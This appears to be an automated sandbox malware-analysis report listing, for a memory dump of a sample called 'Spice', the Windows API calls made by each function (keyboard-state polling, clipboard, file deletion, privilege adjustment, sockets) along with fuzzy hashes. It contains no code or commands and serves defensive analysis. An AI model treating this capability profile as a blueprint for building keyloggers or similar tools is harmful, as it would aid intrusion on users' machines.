                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ED0530
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00ED05B1
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00ED05CC
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00ED05E6
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00ED05FB
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00ED0613
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00ED0625
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00ED063D
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00ED064F
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00ED0667
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00ED0679
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: 5f7ae5ece114f417587f168c03c5888545d81189e6989b58157c64f4db30662a
                                                                                                                                                                                                                                      • Instruction ID: 21a4b4465fbbddf38716a92e21a1091574a15ead3c6981081cc1db3c160ac430
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f7ae5ece114f417587f168c03c5888545d81189e6989b58157c64f4db30662a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C041E7306047C96DFF318A6498043B5BEA0EB51308F0C605BD9D5677C2EAA4D9D5CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ED4451
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ED445E
                                                                                                                                                                                                                                        • Part of subcall function 00E938C8: __woutput_l.LIBCMT ref: 00E93921
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED4488
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00ED4494
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00ED44A1
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00ED44C1
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00ED44D3
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00ED44E2
                                                                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 00ED44EE
                                                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED454F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1433390588-0
                                                                                                                                                                                                                                      • Opcode ID: 3eeba8578570dc75f4e740893442be0fcf244721ca19c08ed51e1e73ef74b568
                                                                                                                                                                                                                                      • Instruction ID: b967ac8e1b4c7c6782a25f1d07e286f6282c0f34034b815a76d7f161681fbece
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eeba8578570dc75f4e740893442be0fcf244721ca19c08ed51e1e73ef74b568
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9431B0B150121AABDF119F60ED48EBF7BADFF04345F044426F912E2290DB34DA22DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                      • Opcode ID: af0a64bb5e2ef2ec0cfe895dec56ab2d349ffed43bd35ccb96da47b91606b2c5
                                                                                                                                                                                                                                      • Instruction ID: 113f23f8f006764472fed439dfa730ba0f60eb429d2792c43159f6cc93c960f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af0a64bb5e2ef2ec0cfe895dec56ab2d349ffed43bd35ccb96da47b91606b2c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B621A171201258AFDB11AF25EC09F6E77E9FF84721F008019F946AB2A1DF31AD019B94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4
                                                                                                                                                                                                                                        • Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ED3D96
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3E3E
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00ED3E51
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3E6E
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3E90
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3EAC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 4002782344-1173974218
                                                                                                                                                                                                                                      • Opcode ID: ef5793d83e27a307770f1fc5463797460b5ffb9125b174c4942fb2424745ae11
                                                                                                                                                                                                                                      • Instruction ID: a13814352745eedbcbfae2b5db6f3f9b2867ff98a075b064bf510511dd63a6a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef5793d83e27a307770f1fc5463797460b5ffb9125b174c4942fb2424745ae11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4851857180120D9ACF15FBB0D9529EDB7B9EF10304F2011AAE849B7292DF315F0ADB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDFA83
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDFB96
                                                                                                                                                                                                                                        • Part of subcall function 00E752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00EDFAB3
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDFAC7
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDFAE2
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 00EDFB80
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 2185952417-438819550
                                                                                                                                                                                                                                      • Opcode ID: 29a47554fe3e1df50c5a1dfc144a975c54722d6e7ad8085361ae4e4352cae642
                                                                                                                                                                                                                                      • Instruction ID: 99490684dffc9f166aed483380e5d29e7d59cc37ae9d05749dc3ad3e2ae78afe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29a47554fe3e1df50c5a1dfc144a975c54722d6e7ad8085361ae4e4352cae642
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2417F7190021A9FCF14EF64CC59AEEBBB8FF05354F1451A7E819B22A1EB309E45DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC93E3
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC9410
                                                                                                                                                                                                                                        • Part of subcall function 00EC9399: GetLastError.KERNEL32 ref: 00EC941D
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00ED57B4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                                                                                      • Opcode ID: 68c0234de4780d468b77c59e4fb93181d00b0a3591bc891bdeda7bbb5d041234
                                                                                                                                                                                                                                      • Instruction ID: f5bcf82fb4ae13180b3ccc23076b577422830f141ab9b17be38766f7d443456c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68c0234de4780d468b77c59e4fb93181d00b0a3591bc891bdeda7bbb5d041234
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4601F233750717EAE72862A89C8AFBF7698EB04754F34212BF813F22D2EA515C028560
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EE69C7
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE69D6
                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE69F2
                                                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00EE6A01
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6A1B
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00EE6A2F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                                                                                      • Opcode ID: 9d057952eec15e6ad5799bce531ec69074d5706dd9f8125601c0d618bb084fc0
                                                                                                                                                                                                                                      • Instruction ID: e7d220d6173a7a2b872bdeb7c7a891239ad6e9fc4d17a23db3cc01147620ec57
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d057952eec15e6ad5799bce531ec69074d5706dd9f8125601c0d618bb084fc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21BD71600208AFCB10EF64CD89B6EB7E9EF48724F149559E95AB73D1CB70AC019B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E71DD6
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00E71E2A
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E71E3D
                                                                                                                                                                                                                                        • Part of subcall function 00E7166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E716B4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3744519093-0
                                                                                                                                                                                                                                      • Opcode ID: 0bf5bcb3c3322b878179aeb3239687c94a7e536fc7c773336b6cab42635a3f4d
                                                                                                                                                                                                                                      • Instruction ID: 164e9632d4bf51e74fc9291970037f0a188645af438984a9479c0c7252085bba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bf5bcb3c3322b878179aeb3239687c94a7e536fc7c773336b6cab42635a3f4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBA18B70109309BAD73C6B6D4C48EBB359EDF4631AF24F14AF60AF9182CB20AC01E675
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EDC329
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDC359
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EDC36E
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDC37F
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EDC3AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2387731787-0
                                                                                                                                                                                                                                      • Opcode ID: c48c85c599e7b9ca27b7091080b844f2ed8103c844a4ac5182a6774d4bfc7a25
                                                                                                                                                                                                                                      • Instruction ID: ebad26ac5b6ae3494b20aabb83e3d5474126bd64473ea606c66c1e8f2c397609
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c48c85c599e7b9ca27b7091080b844f2ed8103c844a4ac5182a6774d4bfc7a25
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F518B756046028FC714DF68C490EAAB3E8FF49314F20965EF95AE73A1DB30AD06CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EE6E89
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6EB2
                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE6EEB
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00EE6EF8
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00EE6F0C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 99427753-0
                                                                                                                                                                                                                                      • Opcode ID: d34981953b0e1c31c9eba898af66678aa55e91099666c3aca78f3751fdc3e513
                                                                                                                                                                                                                                      • Instruction ID: 674c838c21ef3ffdd511428803b851aa06ef4aebad7e0920681649582a991ce5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d34981953b0e1c31c9eba898af66678aa55e91099666c3aca78f3751fdc3e513
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7441BFB5700204AFDB20AF64DC86F6E73E8AB04714F04D458FA59BB3D2DB709D008BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                      • Opcode ID: ad3f05a77177268a5bf839bab5b65ed048f38bd74f2328f24ec8c24677f7017c
                                                                                                                                                                                                                                      • Instruction ID: 28297b359a4e7a5e27ce2cf6cfa4522c88f9e3c43df28ba42ad49ee7911da148
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad3f05a77177268a5bf839bab5b65ed048f38bd74f2328f24ec8c24677f7017c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2711E2723009199FE7211F268C84B3A7B99FF94720F04A129EB49E7241CB70DD018AA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB027A,?), ref: 00EEC6E7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC6F9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
